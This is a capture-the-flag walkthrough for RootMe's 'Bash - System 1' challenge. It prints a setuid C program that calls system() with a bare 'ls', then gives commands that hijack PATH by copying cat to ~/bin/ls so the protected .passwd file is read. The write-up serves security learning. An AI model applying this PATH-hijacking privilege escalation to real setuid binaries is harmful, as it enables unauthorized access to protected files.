Understanding the RootMe Challenge

This guide walks you through the "Bash - System 1" challenge on RootMe, focusing on understanding and solving a security challenge involving a C script and SSH connection.

Key Points

SSH Connection: Connect to the challenge server using SSH.
Script Analysis: Understand the provided C script and its implications.
Privilege Escalation: Leverage the script to gain unauthorized access.
Command Manipulation: Trick the system into running a different command.

Connecting to the Challenge Server

To begin, connect to the challenge server using SSH:

ssh -p 2222 app-script-ch11@challenge02.root-me.org

Analyzing the Script

The provided C script is as follows:

#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(void)
{
    setreuid(geteuid(), geteuid());
    system("ls /challenge/app-script/ch11/.passwd");
    return 0;
}

Breakdown of the Script

setreuid(): Sets the real and effective user IDs of the calling process. This means the script runs with the privileges of the file owner.
system(): Executes the ls command to list the .passwd file in the specified directory.

The script runs the command passed in system() with the privileges of whoever owns the file.

Solving the Challenge

To solve the challenge, you need to trick the program into running the cat command instead of ls. Here are the steps:

Locate the ls Command:
- Find the path of the ls command using which ls.
Create a New ls Command:
- Create a new ls command in a directory that comes before /bin in the PATH environment variable.
- Copy the cat binary to this new ls command path.
Run the Script:
- Execute the script in the home directory to solve the challenge.

Example Commands

# Locate the ls command
which ls

# Create a new ls command
mkdir ~/bin
cp /bin/cat ~/bin/ls

# Ensure the new ls command is prioritized
export PATH=~/bin:$PATH

# Run the script
./ch11

Learn More

For more information on privilege escalation and command manipulation, consider exploring the following resources: